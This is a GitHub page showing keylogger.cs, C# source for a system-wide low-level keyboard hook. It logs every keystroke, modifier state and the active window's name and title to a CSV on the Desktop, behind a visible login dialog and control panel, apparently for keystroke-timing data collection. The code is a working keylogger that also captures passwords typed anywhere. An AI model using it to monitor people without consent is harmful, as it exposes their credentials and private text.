-
Notifications
You must be signed in to change notification settings - Fork 0
/
keylogger.cs
322 lines (296 loc) · 13.2 KB
/
keylogger.cs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
using System;
using System.Text;
using System.Diagnostics;
using System.IO;
using System.Windows.Forms;
using System.Runtime.InteropServices;
using System.Threading;
namespace dotnet_keylogger
{
class keylogger
{
private const int WH_KEYBOARD_LL = 13; // Low Level Keyboard Hook http://www.pinvoke.net/default.aspx/Enums.HookType
private const int WM_KEYUP = 0x0101; // Key down identifier https://docs.microsoft.com/en-us/windows/desktop/inputdev/wm-keyup
private const int WM_KEYDOWN = 0x0100; // Key down identifier https://docs.microsoft.com/en-us/windows/desktop/inputdev/wm-keydown
private const int WM_SYSKEYDOWN = 0x0104; // Alt key idnentifier https://docs.microsoft.com/en-us/windows/desktop/inputdev/wm-syskeydown
private const int WM_SYSKEYUP = 0x0105; // Alt key idnentifier https://docs.microsoft.com/en-us/windows/desktop/inputdev/wm-syskeydown
private static LowLevelKeyboardProc _hook_callback_pointer = HookCallback; // Create a pointer to the callback function https://docs.microsoft.com/en-us/windows/desktop/api/winuser/nf-winuser-setwindowshookexa
private static IntPtr _hookID = IntPtr.Zero; // Mull Pointer that will be overwritten when hook registered
private static DateTime currentTime;
private static long lastMsgTime = 0;
private static int lastScanCode;
private static int lastFlags;
private static int caps = 0;
private static int scroll = 0;
private static int num = 0;
private static int left_alt = 0;
private static int right_alt = 0;
private static int left_shift = 0;
private static int right_shift = 0;
private static int win = 0;
private static bool newfile = false;
private static control control = new control(true);
private static StreamWriter sw;
private delegate IntPtr LowLevelKeyboardProc(int nCode, IntPtr wParam, IntPtr lParam);
private static IntPtr SetHook(LowLevelKeyboardProc proc)
{
using (Process curProcess = Process.GetCurrentProcess())
using (ProcessModule curModule = curProcess.MainModule)
{
return SetWindowsHookEx(WH_KEYBOARD_LL, proc,
GetModuleHandle(curModule.ModuleName), 0);
}
}
private static IntPtr HookCallback(int nCode, IntPtr wParam, IntPtr lParam)
{
/* https://msdn.microsoft.com/en-us/library/windows/desktop/ms644985(v=vs.85).aspx
* Params:
* nCode : if greater than ZERO, return the result of CallNextHookEx
* wParam : WM_KEYDOWN; WM_KEYUP, WM_SYSKEYDOWN or WM_SYSKEYUP
* lParam :
*/
/* https://docs.microsoft.com/en-us/windows/desktop/api/winuser/ns-winuser-tagkbdllhookstruct
* lParams struct:
* DWORD vkCode = Virtual Key code https://docs.microsoft.com/en-us/windows/desktop/inputdev/virtual-key-codes
* DWORD scanCode = Hardware scan code for the key
* DWORD flags = 8 bit code describing various events
* bits of note:
* 0: Is it an extended key?
* 1: If the key injection comes from a lower integirty process?
* 4: Was the key injected?
* 5: Is the ALT key down? Useless
* 7: Transition (0 if pressed, 1 if released)
* DWORD time = timestamp equivelant to GetMessageTime
* ULONG_PTR dwExtraInfo = Pointer to extra info
*/
if (nCode >= 0 && control.state == true)
{
long diff = 0;
int vkCode = Marshal.ReadInt32(lParam);
int scanCode = Marshal.ReadInt32(lParam + 4);
int flags = Marshal.ReadInt32(lParam + 8);
/// Skip repeat messages if a key if its being held down
if (scanCode == lastScanCode && flags == lastFlags)
{ return CallNextHookEx(_hookID, nCode, wParam, lParam); }
else
{ lastScanCode = scanCode; lastFlags = flags; }
int timestamp = Marshal.ReadInt32(lParam + 12);
if (currentTime.Year == 1)
{
currentTime = DateTime.UtcNow;
}
else
{
if (timestamp < lastMsgTime) { diff = (timestamp + (2147483647 - lastMsgTime)); } //long max wrap
else { diff = timestamp - lastMsgTime; }
currentTime = currentTime.AddMilliseconds(diff);
}
lastMsgTime = timestamp;
int kflags = 0x00000000;
if (wParam == (IntPtr)WM_SYSKEYDOWN)
{
switch (vkCode)
{
case (int)VirtualKeyStates.VK_LALT:
left_alt = 1;
break;
case (int)VirtualKeyStates.VK_RALT:
if (right_alt == 1)
{ return CallNextHookEx(_hookID, nCode, wParam, lParam); }
right_alt = 1;
break;
case (int)VirtualKeyStates.VK_LCON:
/// Some weird bug where right alt send alternating ralt and lcon
if (right_alt == 1)
{ return CallNextHookEx(_hookID, nCode, wParam, lParam); }
break;
}
}
if (wParam == (IntPtr)WM_KEYDOWN)
{
switch (vkCode)
{
case (int)VirtualKeyStates.VK_CAPITAL:
caps = 1 - caps;
break;
case (int)VirtualKeyStates.VK_NUM:
num = 1 - num;
break;
case (int)VirtualKeyStates.VK_SCROLL:
scroll = 1 - scroll;
break;
case (int)VirtualKeyStates.VK_LSHIFT:
left_shift = 1;
break;
case (int)VirtualKeyStates.VK_RSHIFT:
right_shift = 1;
break;
case (int)VirtualKeyStates.VK_LWIN:
win = 1;
break;
}
}
if (wParam == (IntPtr)WM_KEYUP)
{
switch (vkCode)
{
case (int)VirtualKeyStates.VK_LSHIFT:
left_shift = 0;
break;
case (int)VirtualKeyStates.VK_RSHIFT:
right_shift = 0;
break;
case (int)VirtualKeyStates.VK_LWIN:
win = 0;
break;
case (int)VirtualKeyStates.VK_LALT:
left_alt = 0;
break;
case (int)VirtualKeyStates.VK_RALT:
right_alt = 0;
break;
}
}
kflags += scroll << 7;
kflags += num << 6;
kflags += caps << 5;
kflags += left_alt << 4;
kflags += right_alt << 3;
kflags += left_shift << 2;
kflags += right_shift << 1;
kflags += win;
keylog K = new keylog(currentTime, diff, lParam, (byte)kflags, GetActiveWindowTitle(), GetActiveWindowName());
sw.WriteLine(K.ToCSV());
}
return CallNextHookEx(_hookID, nCode, wParam, lParam);
}
private static string GetActiveWindowName()
{
const int nChars = 256;
StringBuilder Buff = new StringBuilder(nChars);
IntPtr handle = GetForegroundWindow();
GetWindowText(handle, Buff, nChars);
return Buff.ToString();
}
private static string GetActiveWindowTitle()
{
const int nChars = 256;
StringBuilder Buff = new StringBuilder(nChars);
IntPtr handle = GetForegroundWindow();
GetWindowThreadProcessId(handle, out int pID);
return Process.GetProcessById(pID).ProcessName;
}
private static void TrackCapsLock()
{
while (true)
{
int temp = (int)GetKeyState(VirtualKeyStates.VK_CAPITAL);
if (temp == -128 || temp == -127) { continue; } /// If depressed right now, skip
caps = temp;
Thread.Sleep(100);
}
}
private static void TrackScrollLock()
{
while (true)
{
int temp = (int)GetKeyState(VirtualKeyStates.VK_SCROLL);
if (temp == -128 || temp == -127) { continue; } /// If depressed right now, skip
scroll = temp;
Thread.Sleep(100);
}
}
private static void TrackNumLock()
{
while (true)
{
int temp = (int)GetKeyState(VirtualKeyStates.VK_NUM);
if (temp == -128 || temp == -127) { continue; } /// If depressed right now, skip
num = temp;
Thread.Sleep(100);
}
}
private static string ObtainUsername()
{
string username = "";
while (username == "" || username is null )
{
var login = new Login();
login.ShowDialog();
username = login.ReturnVal;
}
return username;
}
public static void Main ()
{
string pname = System.Diagnostics.Process.GetCurrentProcess().ProcessName;
Process[] p = Process.GetProcessesByName(pname);
if (p.Length > 1)
Environment.Exit(0); /// already running, time to go bye bye
string username = ObtainUsername();
string filepath = Environment.GetFolderPath(Environment.SpecialFolder.Desktop) +
@"\keylog_" + pname + "_" + username + @".csv";
if (!File.Exists(filepath)) { newfile = true; }
sw = new StreamWriter(filepath, true);
sw.AutoFlush = true;
if (newfile) { sw.WriteLine(keylog.OutCSVHeader()); }
Thread thread_capslock_track = new Thread( new ThreadStart(TrackCapsLock));
thread_capslock_track.Start();
Thread thread_scrolllock_track = new Thread(new ThreadStart(TrackScrollLock));
thread_scrolllock_track.Start();
Thread thread_numlock_track = new Thread(new ThreadStart(TrackNumLock));
thread_numlock_track.Start();
_hookID = SetHook(_hook_callback_pointer);
/// Application.Run(); run without a form
cPanel cp = new cPanel(control); cp.ShowDialog();
UnhookWindowsHookEx(_hookID);
sw.Flush();
sw.Close();
thread_capslock_track.Abort();
thread_scrolllock_track.Abort();
thread_numlock_track.Abort();
Application.Exit();
}
[DllImport("user32.dll")]
static extern IntPtr GetForegroundWindow();
[DllImport("user32.dll")]
static extern int GetWindowText(IntPtr hWnd, StringBuilder text, int count);
[DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
private static extern IntPtr SetWindowsHookEx(int idHook,
LowLevelKeyboardProc lpfn, IntPtr hMod, uint dwThreadId);
[DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool UnhookWindowsHookEx(IntPtr hhk);
[DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
private static extern IntPtr CallNextHookEx(IntPtr hhk, int nCode,
IntPtr wParam, IntPtr lParam);
[DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
private static extern IntPtr GetModuleHandle(string lpModuleName);
[DllImport("user32.dll", CharSet = CharSet.Auto)]
internal static extern int GetMessageTime();
[DllImport("user32.dll", SetLastError = true)]
static extern uint GetWindowThreadProcessId(IntPtr hWnd, out int lpdwProcessId);
enum VirtualKeyStates : int // https://www.pinvoke.net/default.aspx/user32.getkeystate
{
VK_CAPITAL = 0x14,
VK_NUM = 0x90,
VK_SCROLL = 0x91,
VK_LSHIFT = 0xA0,
VK_RSHIFT = 0xA1,
VK_LALT = 0xA4,
VK_RALT = 0xA5,
VK_LWIN = 0x5B,
VK_LCON = 0xA2
}
[DllImport("user32.dll")]
static extern short GetKeyState(VirtualKeyStates nVirtKey);
}
public class control
{
public bool state { get; set; }
public control(bool state)
{
this.state = state;
}
}
}